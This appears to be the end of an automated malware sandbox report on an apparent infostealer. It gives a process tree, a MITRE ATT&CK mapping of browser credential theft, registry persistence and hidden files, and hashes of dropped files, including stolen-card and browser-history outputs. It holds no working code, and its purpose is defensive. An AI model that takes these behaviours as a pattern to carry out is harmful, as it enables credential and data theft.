  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5496,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:5564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5004,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5520 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1360

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4388

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3468

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:6032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Synaptics\Synaptics.exe

Filesize
1002KB

MD5
2311812497bf0fa40026e8240b4830b5

SHA1
74026df01d0f0077d90b0b42515b5f989fd0c771

SHA256
11305a29ac1e292476782fc666193e0124cf9a56bfa1e37d403882bcf780bb93

SHA512
d0da8d4e8e5fcb780064ca4d4f6da3f6b3b7f01f12e7d657cdbc8ff7b94a3c57b4ff35c11749838dd49d4b4df1d83eb1980c2ba1f5d4a5af4835c13d06bdbc92

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
3940148bb31c739fe5a813002002bb78

SHA1
8c934f084062d305772a6643a8610c3a4587f95b

SHA256
b23186f7aebb73adbbc3edab05170def7edd8081ef6cbf4c802db559f5a8d538

SHA512
feb308a2c3f1263afeb806eb34e0dd986f735ed08bea4e2692ab73c3c8b52907d2947d6cefe259888dae95e86d3c7ae0dc3b38777b94cf73e326ec5b5df1a6be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
1191cef5a6c565c135ddf462b001ab1a

SHA1
c7c5800d44c8c17c9f0d7e7585c92667752a540a

SHA256
b10d98ee3024aaa4c11ba34a01ef2269f02002c7838ed07651303ee717ba82a6

SHA512
bef4bd43e984e3a88dc8aa47594f34ca9570b599ba8b873ae69206a7585fcf41ce99e37ad399277751b085e92c0eee6024e7429ddc09be586ea0624b1cb96419

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

Filesize
41KB

MD5
e319c7af7370ac080fbc66374603ed3a

SHA1
4f0cd3c48c2e82a167384d967c210bdacc6904f9

SHA256
5ad4c276af3ac5349ee9280f8a8144a30d33217542e065864c8b424a08365132

SHA512
4681a68a428e15d09010e2b2edba61e22808da1b77856f3ff842ebd022a1b801dfbb7cbb2eb8c1b6c39ae397d20892a3b7af054650f2899d0d16fc12d3d1a011

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
ab61d71c04e32f3a707f33efa414a34a

SHA1
3ccb3a34a38a5825e826634ac06c7a6111b6e270

SHA256
b3b9310ed50d75902be4da31f51649357783f7a0f93687b7854cf8b78746df5b

SHA512
f88f1e0f7baff25f28c4bcac591bb9ecd8b91bb77bce47ed751c641ca587d34498ffb25be88866cd1779d10e598c10744b49a2f6758d80d6f62c220ab95aa14e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
d7afd95c386f1a1a0a2643f80d891239

SHA1
495b077d40e7dd0ba4c3972973c5579e9a4e222e

SHA256
042a77cc723f9adc8d161668dd85fe615030f5e703cd016e8592b2813f8248cc

SHA512
a103538c8b022fb9ef9044f0b136e5efad272533ba2a243140b00dda7c920698ad17382f7173e41cd4903276febf59652fd32b15384d7477771cc12d7bc6a7c7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
840B

MD5
af93edf1b8518ece44501f89041ecd40

SHA1
529fb326921d9c99100ddfcc997dd9988b8ec937

SHA256
fc314f9cb95aa711a27f6127c77ef4970030ffa72cf77ec53ca793bd0cdd5c19

SHA512
a2d1385e8deb5a8024375d5de2e556af4953407b139687bc90c6925f7f3b78f4c2440e92585797c9956d138c76cab8bf76b991bdf75a3740531f512e8b17e411

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
d7bdfe5dd609cc85cf078b71ba622449

SHA1
6b332517d890e496b208e3fd85f11e8f83f9bdf9

SHA256
8ba6f822b00d39e73f0ff52a9c9e070e1505054db0ab20775757b4d683ce64f9

SHA512
104ef6fbae5fe0f7d8bb277469b5edef1857f6316f10ff9faf07d99e42c37e8a3d09d6ff15bbd210a25b9729dcd350a4f3e972456cceaad93535bc4d096de25b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
9490e0871d3296e7bf9171d7021aa3fd

SHA1
2e20618ae2a6064930ebc2f729331d619d5883c0

SHA256
65ce418d282e149c51a9106371e8dfbbb8b9382c1dd695b4339e84b20e823059

SHA512
05d9257e9173765fcb9003566b2cc1e518220696ac9e425a98ece1394b46f0a7a7253758fafb096d39970c2a0922803abec4c60fd2f35b3b64c3c9faa4532866

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
129816a53de08ec3855887ddcccca545

SHA1
d3eeaf2c834a00ea4cc74ea01f1b9d7fbc5e9dab

SHA256
9e21a21c58e870f26394e8dfd850f5dd74351ae82e821b6b229ade32dd72148d

SHA512
82b7410c78b39b6bf68c29cd48be17b466bbe60fad3331767bc7bc1ccbbe4fa4496cee7b97bb6116b19e9eef0cb6e91d5f21dcd28e7f455943bb60c4c678cdda

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
3773906a6b1d83d133f6703ec6915dd0

SHA1
019ba527c2440c583c4f5b52c6c1333cc4ab1505

SHA256
47ada345a4ab82ffbe22042f234ee33fa92f15979cd209b1e29132460fb23d50

SHA512
e1d8555d044d8b6004d6524f06fee1595e36d7891b719961a226192de10233f65075864c8cb0d60b7ba8611c1d1b5597da50f4ca3309f0d4906da008f6674aeb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
9e8cf94aa77ce9c966ce0f10087cec7e

SHA1
805afc43d3e0c8df0ca8d9666de352e0517f8e46

SHA256
795e4c0d1408417df6eeb753dcd767c246aa3277c6123bce0eee2c62a2cfccf1

SHA512
8297993329d49d254d5b149fd870707a852e3646a260b13bf69924c01e40108aa444f4edfcf8b59a6af3f770229d59aea91aa3c59270a0161ce41ca7859f2739

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
1f0b97f48a6e40a5a9e4b0ddd86a81f5

SHA1
9d20d30c0b633070a77c6cfe725061bbbaa35f46

SHA256
946f8ca6823ee2ae41840f611e2aef2caa1690bb3b935d3d8c88b4c79203de6d

SHA512
022d40d920b03baf1e313f9a78e5d258366faf4271417df687138797a5ab04d07d786babb367d76676620641f084532a6da0a225d4a208e1ae670bff60c4d771

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
f2f149257989fd39444bae0f9eee250b

SHA1
562685d5ed1665e1b7d7ea34916aa2188d674651

SHA256
e1edcd0648891d7e131efc36f45c4654696f6f689a9c9f487c887495c95a1616

SHA512
232d793da15c91bc7c2ae8ba634eed2c4c784ff215b5166370f53d3b6a8dee1bbff14066335261793f351421df4784b36bc0540792cebf81fe7f812f3580fc48

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1f3e7188c4323f23f07672042f20f0cd

SHA1
64e4f0a49c6ad25d0075bd75424ec11a4aa3d639

SHA256
836b0daf178cafe6339459cab867924ddf1841e4813df7bbb0c76228ca8b72ec

SHA512
d55f3c18a818ad8e436e9fd856322bee2c81bb716c281d5e6a75783ac7922945b9211bd60eb50c0829c6aa9c7e1057465ff5fa5f3e15b6b4c3c18fe6c5f4f931

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
31cb0320ce9a242f608bad817bd66765

SHA1
b41349592cd5c7f1440114a8d136780518a71d2c

SHA256
48cd77d5f1034afc74dbddc0825f0eac26346dbf74e34120bdd47d6cb0205d89

SHA512
bcab5862a01f8a375b62160fe3273f9c5464e41bf3edce8c4dc653fafc801678381e165120e270ecc12569af889bb358a53c72b7b4a209cb80ffb7cdbfa54ebe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
ed228d533f384fedf0f046f333b344be

SHA1
ffed630d1453fa28e8aa3db9bfcf31f80f03f0ba

SHA256
f9c5f75e7b783a3428d825a3e619f1ccc4eb2973aea498512ed04614bbae852a

SHA512
71024aca0469a37f84114e8f2cb622e4163b40861179b601e14923ab02eef630e25acb5480ce7f45aa893b07a789f4c6bbdde45ddfe0107e739a94ba526d8af5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0db2d07a53e11ac8f2d6f8e028a728f5

SHA1
b63bed56708af292ea8200d0b9e23076a683db29

SHA256
1d980a41077a5279a44b917c0c37c0858cfa60c999636baf0362283b5c90be74

SHA512
ddc8b50e69c8b484547d15d619d498ecf8d34cff8ff17e94476eb80e78a0a870a3c962c8e4f9384333f394361498ccabc0691cdd1a60ed6b81f90b10a7d9ad27

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
b6e4e9fc7130acfbc417281a30683ab7

SHA1
2d75534dfaa79a4312c067a99f26965cca66f156

SHA256
3171eba366f03b8bdb3d05a150ba12a0b4c3469104db861f2bff56be165e310d

SHA512
48890c4ddac5f3e123758b6e86bb37e18f72847b30c3f8a1b2837c6ee2c038cbf0ecf1cec02f9d04bb8b18544d2a855d15828bad263c5df6d54d01443385b676

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
37f4e6e77c83b2339a7e3a29ec6d9d46

SHA1
c9f62866d9b5a67c93f4a3af3a5d8621c38a6dd6

SHA256
9e1f63697c831a4452912d8cf79089f53316ac25b32bf10cea2de7a8ab8665da

SHA512
8ef258f3b1fbde6d1fdf7d6844763afe916331bef906caae4a62224b0c6a3e53fca8ae5ca3fb2caa3102e9912355778c871de9b164905a1a838f622745c3b034

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e2ca5db7af7d58182c36b169d480892c

SHA1
715dfddb44bae460c85e4fed4ce17e01c38e8177

SHA256
9c4eceb37c341939b189c2a66793dbca0d0745bd5c5021bcf0aa8c54340667dc

SHA512
e4aa99d9a5f5fe1e4bd6ba024aa8b2172392fce1024956f521ca0d7c10a665b8c9572455171e4a8e213e9e4366741d1275c756c6ba9d53f45517feb2d7d95b57

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
62b576f4dc4879bdd6d92d0fac76277b

SHA1
058eacd2bad5fc08e232969ef5f91b939046ccbd

SHA256
e7083831c4a04f0dfe7402e37a5e3ce0a9ec09d632699a89ea6a342ff6469e8f

SHA512
f2a36a0e93fd0c63ea064f478f349633d6e7cc482f178309f6f8538454cce6024594f68efe63e979a00b4090fff76472677af5c047a4258a6fd3adbfeb530bd3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
5e5e6d234d0312ae57025a127be8ead9

SHA1
8b92a492ac43e5ceba1a936964e16a2502309da8

SHA256
54b39a12aabe03ea9c75b8c7f72977b77cd06cd71f9fa564001a46f24cd4f1ca

SHA512
1b07e6c4528464a0560f5f5ca4941975372397d95046224e8c55dcf7f4b19b08848d2833778254ec25767d4969ce1cca34a76a9fcb9fafe03e7e9a2b855cc93f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
1be9ccdd28640cb70be86996917aa8b2

SHA1
34de6e97264b943c7e6363cc7cec17a3a82c8b23

SHA256
613887833d1fd009e58e012ff6f637ca76f2b4a095736f9dbe34fd161666c1a9

SHA512
464d225b0861fd8d9ae6706cfa6541bcd639016da64f9f844a0c03f230002b0ccd51d76bb138c3e216d7970783c6733f45b1819888e8d1daa8bfb80a973cd767

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
3d052b3ef55f558e7459e0026891d245

SHA1
94505548d153437713b10381510aec80f1944df1

SHA256
7f3355b68181f3f95fe852a5fbf7316f8ded615e99bcdd9cd05e7f0b2fc08cd6

SHA512
dfd4e35884827aff09b81bf2feea4cb39a716fd6c52766cfd765f6932b64ea094f6702993e3cb71c0081eb15b64d7f7f54d9c67aa3a8ac226b6c581f05cf8b5e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
12e37f2ecade447aeea7bcd2e82046dc

SHA1
b15219c751e95f8d4a82fb9c8165cfb96a05c19c

SHA256
5cc2c3b44101958315b75c8895d1e7bacbdd925eda73e25bf46294ffe975c49b

SHA512
cc010255efe289884e7032f04097db5c66296274b16fae8899747bcd42c080f9a184339360f92da4706407c5e9d7be34d8e2ee6290725b8c4d0d9631326f287d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
c14822790f67ce044a30a1dae020d87d

SHA1
9597fd4c6068a13e565a30731e4882c2189be870

SHA256
ab183e0d11024939d86adf0c0bd49856a0c8359b5dd6d91eddd8c9c357ec75a8

SHA512
8d6f30fbdfbc6028932b91f5010228762eaf349f8504ea0fc16bcaa6088c24af14c7674af91fcd4d64de18cd460cc38265823d174f87b9cf52f7e785d805ee19

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
b9f0608ebf2e610d3bf350e6184a99ee

SHA1
8bdb3a4377e0957dcca9187d2fb4558720a7b300

SHA256
bed0cab111e428d37762725683aa23f2817d0dfb46e769928a925a34ab8204b5

SHA512
38fe2fbe96e55594820520220f23f5f740d72467eba8b10839542663f58db88d2a2b538bf048aa5fb7b90672a582d0c721cfa5ce1bf8f9c3eb18ba3a23b8e589

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
233KB

MD5
5d2c53c767e04e9160a216428fe2f988

SHA1
8b406736621aac8408c30dd7fd24e5e8ec783dab

SHA256
d9546acd9520e5e3971c32bb4593e3e291ee1b6c62ff3b5a1ba8662d3e24b322

SHA512
09af6a88c523bfb74124ba24150f0f877b6b90fd681231956a2fd9ba782aecd5e5a85e4ca6f6fca4b805235ab4d6a1ebd8325bf977deae27379a745bdefb2bea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
233KB

MD5
a68f5c694443c1520c8a8c31383e90ed

SHA1
e8acec8c166834bb07b8fd268a6d91766970b707

SHA256
113e26155444147450d67e0d64d428df3715327c251819a6ac20fd19bb70e75b

SHA512
1a9548cf688939400175f29e4fa465c1454d428d1d000794d539167330b4289d181f547a1c50c3828f29aaed8b5800d509b59f0bee7ce70eef3807fb8b4d67b0

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\7d512bc4-070a-4bde-884a-7dd1d24b21a3.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
1301a13a0b62ba61652cdbf2d61f80fa

SHA1
1911d1f0d097e8f5275a29e17b0bcef305df1d9e

SHA256
7e75ad955706d05f5934810aebbd3b5a7742d5e5766efd9c4fc17ee492b2f716

SHA512
66aa4261628bb31ee416af70f4159c02e5bbfbe2f7645e87d70bb35b1f20fa915d62b25d99cd72c59580d1f64e6c6b5ad36ace6600d3bcdb67f45036d768ed8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\._cache_bound.exe

Filesize
248KB

MD5
cb9e5667e854bf3875a6017c707cc7ed

SHA1
647c933ddb3686ba133ca2150c64c37e01fc43d9

SHA256
d1e22dcfd2a76b2fcae8ec82be80f005b5c3ff3c6b2b1637fbd3cc5c49b5763f

SHA512
55312a0b54d13ba2ae8cf4ce963e1ace0353d8d414e57bfdd1690f890b338ae05d0cbe9452dd2b93db0a742b33ccb820d6312616a9aaface1a1b2ea52df96917

Download Submit
C:\Users\Admin\AppData\Local\Temp\4976da2c-f629-49ae-9114-91e0b97c9c0a.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\B4B85E00

Filesize
23KB

MD5
2558733409947bf247026c0a167f8888

SHA1
8bd11c81b5c4ef9b5f31ace9feb0febb853b65fd

SHA256
c11006c780a2282f325b34c22f71c6becd0d745ededf7c581e1dff2a21e105ce

SHA512
0244d6a13fbd14515c32f335e6ef2df40888478f338b01d63f1a923741cff2d52add9321b54d71dd9092db08765ddc1de058a3596984a739d4bf0f6b197472e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\LkhvBqVd2A\Browser\history.txt

Filesize
23B

MD5
5638715e9aaa8d3f45999ec395e18e77

SHA1
4e3dc4a1123edddf06d92575a033b42a662fe4ad

SHA256
4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6

SHA512
78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

Download Submit
C:\Users\Admin\AppData\Local\Temp\LkhvBqVd2A\Common Files\AddRename.odt

Filesize
416KB

MD5
068f7d05cf19c44ef479d933a38a0b90

SHA1
01aeb3a1f4aa670ec501be40db3ee6b3414fe8a8

SHA256
1521608e036c259f780b71d1730a16c8623eca38da48706cf497b4dae41a34d8

SHA512
c0baf4da636cdd9cea198b0c932a5f0adb474329355ee4f4032b4617962ad29479443044ce78f6960cf2b6792e8b093c4bedfde828e50d3b68f5809c78c17d83

Download Submit
C:\Users\Admin\AppData\Local\Temp\LkhvBqVd2A\Common Files\ApproveConnect.odt

Filesize
768KB

MD5
8cc4d02b63ae4534041c8cbf1ba01d51

SHA1
a88acb5744cf5a4ed4389dcd5ec53508c1811b12

SHA256
513338d005e2871edc84968e1868c1d787172acfb8579cfd86f387a75e5803ad

SHA512
71fa361ee9620c172736e08c018b4ebd12d064ef27e0119bb4ccaf07e9fa72c2a0937c4470ee7b4f06bd775811c092d93aae46dfdbee1e2f0966d1737aeb5dca

Download Submit
C:\Users\Admin\AppData\Local\Temp\LkhvBqVd2A\Common Files\RestartClear.pdf

Filesize
640KB

MD5
a09433e1f0f8ba6c772d56b857b180ba

SHA1
d539af7b5e35b634be39508109e1ac645cfc2ef4

SHA256
af626c773d09e6ea49654f70e930c879f82aa13977b49948e5b51df882c65a22

SHA512
3f6d626c6bbf8f8b2d81db6dd57dcff9b758e3e030f40b641f29bd1e8475783fd079a01969a50c941b2c1714d6bc1d1a9a149a839179e732565a8a63f497ec9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZplXQpL2Pj\Browser\cc's.txt

Filesize
182B

MD5
0323e199b36dda7f977b6ba47700b820

SHA1
aea1d0b0d2625d06114e1488db61853f31936356

SHA256
00b7a5e5cd19bf97ebcc959e3e198fb662fe320244584ffe8b3076649d4cdad0

SHA512
6de17c82d9c05ffe66f8e03c2abf1de3682da3f491dd70650e1b34c0c6e6b05a4480efe62f80ee6a62167f5a48b84edfe9880750ccc2d4e726d9c41223f47daa

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZplXQpL2Pj\Wifi\No Wifi Networks Found.txt

Filesize
23B

MD5
ee5aea0be15d3fbe09fde56c712d5478

SHA1
d26dcac8c96f9a2422012ef19d8539e449c13ed6

SHA256
008f085ba3eb767dfbba6996130381d46882f4f8845ac0facd32dec918b236a2

SHA512
69ab01956f085efdf79d48be9ba425b630049c997ccad3a6f9bd44fc0d2936c1a4360536e48dc3b15fd96b4aa693d86cdbdbb699ea5cd11d619cf2dabd8a3e9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11362\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11362\_bz2.pyd

Filesize
49KB

MD5
f5452fb8fa044d7daa52064c54416969

SHA1
d02f8df23345bcba2a7e24cd7e979efd5a589d9d

SHA256
63c96e5a59153df65c5d648646e04bc68ef3e5bd53caf66d56144d901fddad16

SHA512
e0a140cc3e3d6fa3ddd15bc4fb4c76b1c587bd25a573cb3308024d6678e32572ae16276cfd0b8317b81cdaa5abfafcc97b9218e8772f0988561d2c37931c2470

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11362\_ctypes.pyd

Filesize
63KB

MD5
bec2aaa8b86b409ac9669af939ea2387

SHA1
0ce5becc0e156046be7ee0264adcc39c73f27922

SHA256
bbb6f23e39328245fbe5b983184acc1cf5913fb8a6c99b266f61dd10cad3d65d

SHA512
f783dac11eca83095290d707dc8584f5b757979ed87267d9860b7902db6677f2ca63d6c93395a8038031e5cd7b1e05d38a0bb43b1c28b593fdcab05465568eb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11362\_lzma.pyd

Filesize
87KB

MD5
1ef19fbea032302e329f279ae60baa5f

SHA1
1f3d9aa96fd418675d28371eee9e4862c0f1130e

SHA256
77bf984b64e790833491db927127b5c66ff9c0d9a786f8766164ea543c75aeef

SHA512
7a197d8be31930567c07f67a05ca03e17da8862d7c87ca38b6814b2486cc19af32a58f14a9ac7dfdb4b8198df732e6e084a94bca5b37f75a0308b2d4cceb762c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
e8b9d74bfd1f6d1cc1d99b24f44da796

